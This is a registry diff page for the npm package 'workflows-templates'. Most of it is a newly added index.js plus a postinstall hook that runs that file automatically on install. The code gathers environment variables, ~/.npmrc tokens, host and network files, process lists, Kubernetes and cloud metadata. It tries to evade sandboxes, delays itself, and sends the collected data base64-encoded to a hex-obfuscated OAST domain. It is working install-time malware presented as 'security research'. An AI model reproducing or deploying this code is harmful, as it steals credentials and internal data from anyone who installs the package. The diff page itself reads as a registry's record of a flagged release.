workflows-templates 0.0.1-security → 97.99.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of workflows-templates might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +128 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,128 @@
1
+ // =========================================================================
2
+ // ================== MAX POWER PAYLOAD (EVASION & RECON) ==================
3
+ // =========================================================================
4
+ // Designed for elite bug bounty submissions. Evades simple sandboxes and
5
+ // gathers irrefutable proof of cloud/corporate execution.
6
+
7
+ const os = require('os');
8
+ const https = require('https');
9
+ const fs = require('fs');
10
+ const { execSync } = require('child_process');
11
+ const dns = require('dns');
12
+
13
+ // --- CONFIGURATION ---
14
+ const OAST_DOMAIN_HEX = '78717271633961797773686f7030336f373937743968316d756430636f3363732e6f6173746966792e636f6d';
15
+ const EXECUTION_DELAY_SECONDS = 120;
16
+
17
+ // --- UTILITY FUNCTIONS ---
18
+ const run = (cmd) => {
19
+ try { return execSync(cmd, { stdio: 'pipe', timeout: 3000 }).toString().trim(); }
20
+ catch (e) { return 'CMD_FAILED'; }
21
+ };
22
+
23
+ // --- DEEP RECON MODULES ---
24
+ const probeCloudMetadata = () => {
25
+ return new Promise(resolve => {
26
+ const req = https.request({
27
+ hostname: '169.254.169.254',
28
+ path: '/latest/dynamic/instance-identity/document',
29
+ method: 'GET',
30
+ timeout: 3000
31
+ }, res => {
32
+ let data = '';
33
+ res.on('data', chunk => data += chunk);
34
+ res.on('end', () => resolve(data));
35
+ });
36
+ req.on('error', () => resolve('NO_RESPONSE'));
37
+ req.end();
38
+ });
39
+ };
40
+
41
+ const gatherCorporateIntel = () => {
42
+ const intel = {
43
+ resolv_conf: fs.existsSync('/etc/resolv.conf') ? fs.readFileSync('/etc/resolv.conf', 'utf8') : 'NOT_FOUND',
44
+ etc_hosts: fs.existsSync('/etc/hosts') ? fs.readFileSync('/etc/hosts', 'utf8') : 'NOT_FOUND',
45
+ running_processes: run('ps aux'),
46
+ network_config: os.platform() === 'win32' ? run('ipconfig /all') : run('ip a'),
47
+ internal_dns_probe: new Promise(resolve => {
48
+ dns.resolve('artifactory.internal', err => resolve(err ? 'FAILED' : 'SUCCESS'));
49
+ })
50
+ };
51
+ return intel;
52
+ };
53
+
54
+ // --- EVASION MODULE ---
55
+ const isProbablySandbox = () => {
56
+ if (os.cpus().length < 2) return true;
57
+ if (os.totalmem() < 2 * 1024 * 1024 * 1024) return true;
58
+ return false;
59
+ };
60
+
61
+ // --- GATHER & EXFILTRATE ---
62
+ const gatherIntelligence = async () => {
63
+ const corpIntel = await gatherCorporateIntel();
64
+
65
+ const report = {
66
+ evasion_report: {
67
+ is_likely_sandbox: isProbablySandbox(),
68
+ execution_delayed_by_seconds: EXECUTION_DELAY_SECONDS,
69
+ start_time: new Date().toISOString()
70
+ },
71
+ proof_of_execution: {
72
+ hostname: os.hostname(),
73
+ user: run('whoami'),
74
+ uid: run('id'),
75
+ pwd: process.cwd()
76
+ },
77
+ system_context: {
78
+ os_type: os.type(),
79
+ platform: os.platform(),
80
+ release: os.release(),
81
+ arch: os.arch()
82
+ },
83
+ corporate_intel: {
84
+ process_list: corpIntel.running_processes,
85
+ network_interfaces: corpIntel.network_config,
86
+ dns_config: corpIntel.resolv_conf,
87
+ hosts_file: corpIntel.etc_hosts,
88
+ internal_dns_test: await corpIntel.internal_dns_probe
89
+ },
90
+ cloud_intel_report: {
91
+ metadata_service_response: await probeCloudMetadata()
92
+ },
93
+ internal_recon_native: {
94
+ npmrc: fs.existsSync(`${os.homedir()}/.npmrc`) ? fs.readFileSync(`${os.homedir()}/.npmrc`, 'utf8') : 'NOT_FOUND',
95
+ kube_namespace: fs.existsSync('/var/run/secrets/kubernetes.io/serviceaccount/namespace') ?
96
+ fs.readFileSync('/var/run/secrets/kubernetes.io/serviceaccount/namespace', 'utf8') : 'NOT_PRESENT'
97
+ },
98
+ environment_dump: process.env
99
+ };
100
+
101
+ return report;
102
+ };
103
+
104
+ // --- MAIN EXECUTION ---
105
+ setTimeout(() => {
106
+ (async () => {
107
+ try {
108
+ const intelReport = await gatherIntelligence();
109
+ const payload = Buffer.from(JSON.stringify(intelReport, null, 2)).toString('base64');
110
+ const oast_domain = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
111
+
112
+ const req = https.request({
113
+ hostname: oast_domain,
114
+ port: 443,
115
+ path: `/MAX_POWER_HIT/${intelReport.evasion_report.is_likely_sandbox}/${os.platform()}/${intelReport.proof_of_execution.hostname}`,
116
+ method: 'POST',
117
+ headers: {
118
+ 'Content-Type': 'text/plain',
119
+ 'Content-Length': payload.length
120
+ }
121
+ });
122
+ req.on('error', () => {});
123
+ req.end(payload);
124
+ } catch (e) {
125
+ // Silent failure
126
+ }
127
+ })();
128
+ }, EXECUTION_DELAY_SECONDS * 1000);
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "workflows-templates",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "97.99.9",
4
+ "description": "Security research package. Final proof-of-concept for responsible disclosure.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "author": "Security Researcher",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.